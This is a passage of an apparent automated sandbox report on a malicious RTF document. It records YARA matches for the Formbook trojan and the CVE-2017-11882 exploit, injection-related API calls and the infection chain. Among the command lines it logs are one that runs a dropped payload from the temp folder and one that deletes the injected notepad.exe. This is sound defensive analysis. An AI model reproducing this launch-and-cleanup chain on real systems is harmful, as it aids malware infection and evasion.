          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Client.exe PID: 316, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: notepad.exe PID: 2188, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ipconfig.exe PID: 1800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, score = , sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00AF3F92 appears 132 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00AF373B appears 245 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00AAE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B1F970 appears 84 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00AADF5C appears 121 times
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00322548 NtQuerySystemInformation,6_2_00322548
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00322540 NtQuerySystemInformation,6_2_00322540
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0037F248 NtResumeThread,6_2_0037F248
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0037D898 NtWriteVirtualMemory,6_2_0037D898
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0037CE80 NtAllocateVirtualMemory,6_2_0037CE80
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0037D398 NtProtectVirtualMemory,6_2_0037D398
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0037DD98 NtSetContextThread,6_2_0037DD98
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004A0178 NtClose,6_2_004A0178
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0240B2E0 NtWriteVirtualMemory,6_2_0240B2E0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0240B7B0 NtCreateThreadEx,6_2_0240B7B0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A360 NtCreateFile,9_2_0041A360
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A410 NtReadFile,9_2_0041A410
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A490 NtClose,9_2_0041A490
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A540 NtAllocateVirtualMemory,9_2_0041A540
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A35A NtCreateFile,9_2_0041A35A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A40A NtReadFile,9_2_0041A40A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A48F NtClose,9_2_0041A48F
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041A53C NtAllocateVirtualMemory,9_2_0041A53C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA00C4 NtCreateFile,LdrInitializeThunk,9_2_00AA00C4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA0078 NtResumeThread,LdrInitializeThunk,9_2_00AA0078
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA0048 NtProtectVirtualMemory,LdrInitializeThunk,9_2_00AA0048
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9F9F0 NtClose,LdrInitializeThunk,9_2_00A9F9F0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9F900 NtReadFile,LdrInitializeThunk,9_2_00A9F900
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_00A9FAE8
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_00A9FAD0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_00A9FBB8
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_00A9FB68
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FC90 NtUnmapViewOfSection,LdrInitializeThunk,9_2_00A9FC90
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FC60 NtMapViewOfSection,LdrInitializeThunk,9_2_00A9FC60
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FD8C NtDelayExecution,LdrInitializeThunk,9_2_00A9FD8C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_00A9FDC0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FEA0 NtReadVirtualMemory,LdrInitializeThunk,9_2_00A9FEA0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_00A9FED0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FFB4 NtCreateSection,LdrInitializeThunk,9_2_00A9FFB4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA10D0 NtOpenProcessToken,9_2_00AA10D0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA0060 NtQuerySection,9_2_00AA0060
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA01D4 NtSetValueKey,9_2_00AA01D4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA010C NtOpenDirectoryObject,9_2_00AA010C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA1148 NtOpenThread,9_2_00AA1148
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA07AC NtCreateMutant,9_2_00AA07AC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9F8CC NtWaitForSingleObject,9_2_00A9F8CC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9F938 NtWriteFile,9_2_00A9F938
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA1930 NtSetContextThread,9_2_00AA1930
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FAB8 NtQueryValueKey,9_2_00A9FAB8
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FA20 NtQueryInformationFile,9_2_00A9FA20
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FA50 NtEnumerateValueKey,9_2_00A9FA50
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FBE8 NtQueryVirtualMemory,9_2_00A9FBE8
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FB50 NtCreateKey,9_2_00A9FB50
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FC30 NtOpenProcess,9_2_00A9FC30
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FC48 NtSetInformationFile,9_2_00A9FC48
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA0C40 NtGetContextThread,9_2_00AA0C40
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AA1D80 NtSuspendThread,9_2_00AA1D80
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FD5C NtEnumerateKey,9_2_00A9FD5C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FE24 NtWriteVirtualMemory,9_2_00A9FE24
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FFFC NtCreateProcessEx,9_2_00A9FFFC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00A9FF34 NtQueueApcThread,9_2_00A9FF34
          Source: Client.exe.0.drStatic PE information: Section: 5++.8$ ZLIB complexity 1.0003371646578538
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@11/9@2/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfVirustotal: Detection: 43%
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfReversingLabs: Detection: 21%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.n.o.t.e.p.a.d...e.x.e...........................B.........0.......0.....Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ......................0.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P1P.......4.t...........0.......................&.................0.....Jump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A CJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A CJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5B39.tmpJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfStatic file information: File size 2870044 > 1048576
          Source: Binary string: ipconfig.pdb source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ipconfig.pdbN source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: notepad.pdb source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000003.950924763.0000000000900000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1046378480.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.949038674.00000000002A0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1176285668.0000000002220000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000003.1044991591.0000000002090000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drInitial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00A286CE push es; ret 6_2_00A286E3
